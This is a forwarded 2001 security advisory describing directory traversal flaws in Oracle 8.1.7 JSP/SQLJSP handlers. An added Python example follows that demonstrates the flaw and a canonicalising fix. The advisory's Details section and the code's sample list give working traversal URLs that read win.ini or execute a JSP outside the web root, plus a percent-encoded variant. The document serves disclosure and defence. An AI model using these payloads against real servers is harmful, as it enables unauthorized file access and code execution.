From: Steve (steveSECURESOLUTIONS.ORG)
Date: Mon Jan 22 2001 - 14:44:04 CST

    -----Original Message-----
    From: Georgi Guninski
    Sent: Monday, January 22, 2001 7:21 AM
    Subject: Oracle JSP/SQLJS handlers allow viewing files and executing JSP outside the web root

    Georgi Guninski security advisory #36, 2001

    Oracle JSP/SQLJS handlers allow viewing files and executing JSP outside the
    web root

    Systems affected:
    Oracle JSP/SQLJSP handlers, installed by default with Oracle 8.1.7 on Windows 2000.
    I have not tested other versions, but they may be vulnerable.

    Risk: High
    Date: 22 January 2001

    Legal Notice:
    This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
    You may not modify it and distribute it or distribute parts of it without the author's
    written permission.

    Disclaimer:
    The opinions expressed in this advisory and program are my own and not of any company.
    The usual standard disclaimer applies, especially the fact that Georgi Guninski is not
    liable for any damages caused by direct or indirect use of the information or
    functionality provided by this advisory or program. Georgi Guninski bears no
    responsibility for content or misuse of this advisory or program or any derivatives
    thereof.

    Description:
    It is possible to view files outside the web root.
    It is also possible to execute .JSP files outside the web root, on the same partition
    as the web server's root.

    Details:
    I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers.
    Basically these are directory traversal vulnerabilities.
    1) The following URL:
    ---------------------------------------
    http://oraclehost/servlet//..//../o.jsp
    ---------------------------------------
    will execute c:\o.jsp if there is such a file.
    As a side effect this shall create the directory C:\servlet\_pages\_servlet and shall
    put in it the java source and .class file of o.jsp

    2) The following URL:
    -------------------------------------------------------------
    http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini
    -------------------------------------------------------------
    shall read c:\winnt\win.ini. It is normal to receive an error in response to this
    request. To see the result, go to: http://oraclehost/_pages and look in the
    directories for .java files containing "win"

    3) The following URL:
    -----------------------------------------------------------------
    http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
    -----------------------------------------------------------------
    shall read c:\winnt\win.ini. It is normal to receive an error in response to this
    request. To see the result, go to: http://oraclehost/_pages and look in the
    directories for .java files containing "win"

    Note: all URLs were tested with Netscape 4.76 or direct HTTP requests. They do not
    work with IE.

    Vendor status:
    Oracle was contacted on 18 January 2001.

    Regards,
    Georgi Guninski
    http://www.guninski.com
    ----------------------
    You may visit Guninski Security Mailing List page at
    http://www.guninski.com/mailinglist.html
    ----------------------

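The three URLs in the advisory are ordinary path traversal: the handler glues the request path onto its document root and lets the filesystem collapse the doubled slashes and climb the `..` segments, so whatever check existed ran on a string the OS never saw. The following is an added example, not part of Guninski's advisory or the forwarded message, that reproduces the effect on those URLs and shows the resolve-then-check mapping that refuses them. It assumes a POSIX-style web root of `/webroot` sitting one directory below the filesystem root and a naive handler that concatenates root and path; the Oracle handler's real mapping is not documented on this page, so the constants, the function names and the percent-encoded `%2e%2e` variant (which goes beyond what the advisory tested) are all mine.

```python
"""Path traversal through doubled slashes and '..', as in the Oracle JSP/SQLJSP
advisory, plus a hardened mapping.  Added example; assumptions are marked."""
import posixpath
from urllib.parse import unquote, urlsplit

WEB_ROOT = "/webroot"  # assumed document root (one level below the partition root)


def naive_map(request_path, web_root=WEB_ROOT):
    """Vulnerable mapping: root + path with no canonicalisation.

    The result is handed to the filesystem, which collapses '//' and resolves
    '..' on its own, so any test done on request_path was done on the wrong
    string.  Stands in for the behaviour the advisory describes; not Oracle code.
    """
    return web_root + request_path


def filesystem_view(path):
    """What the OS actually opens for a naive path: '//' collapses, '..' climbs."""
    return posixpath.normpath(path)


def safe_map(request_path, web_root=WEB_ROOT):
    """Hardened mapping: decode, canonicalise, then insist the result is still
    under web_root.  Returns the resolved path or raises ValueError."""
    decoded = unquote(request_path)  # %2e%2e -> .. before normalising (assumed extra case)
    canonical = posixpath.normpath(web_root + "/" + decoded.lstrip("/"))
    root = posixpath.normpath(web_root)
    if canonical != root and not canonical.startswith(root + "/"):
        raise ValueError(f"request escapes web root: {request_path!r} -> {canonical}")
    return canonical


def request_escapes_root(url, web_root=WEB_ROOT):
    """True when the URL's path, once canonicalised, lies outside web_root."""
    try:
        safe_map(urlsplit(url).path, web_root)
    except ValueError:
        return True
    return False


# Constructed sample requests: the three URLs from the advisory, one benign
# request, and a percent-encoded variant the advisory does not mention.
REQUESTS = [
    "http://oraclehost/servlet//..//../o.jsp",
    "http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini",
    "http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini",
    "http://oraclehost/examples/index.jsp",
    "http://oraclehost/a.jsp/%2e%2e/%2e%2e/winnt/win.ini",
]


def classify(requests=REQUESTS, web_root=WEB_ROOT):
    """Map each URL to (escapes_root, path the filesystem would open for the
    naive handler)."""
    out = {}
    for url in requests:
        path = unquote(urlsplit(url).path)
        out[url] = (request_escapes_root(url, web_root),
                    filesystem_view(naive_map(path, web_root)))
    return out


if __name__ == "__main__":
    for url, (escapes, opened) in classify().items():
        flag = "ESCAPES" if escapes else "ok     "
        print(f"{flag} {url}\n        -> {opened}")
```

With the assumed root, the first URL resolves to `/o.jsp` and the other two to `/winnt/win.ini`, which is the `c:\o.jsp` and `c:\winnt\win.ini` behaviour the advisory reports. The check in `safe_map` works because it compares the canonical path the filesystem will actually open against the root, rather than looking for `..` in the raw request; the advisory's note that the URLs fail from IE is consistent with a client that rewrites dot segments before sending, which is exactly why a server-side check must not rely on the client having done so.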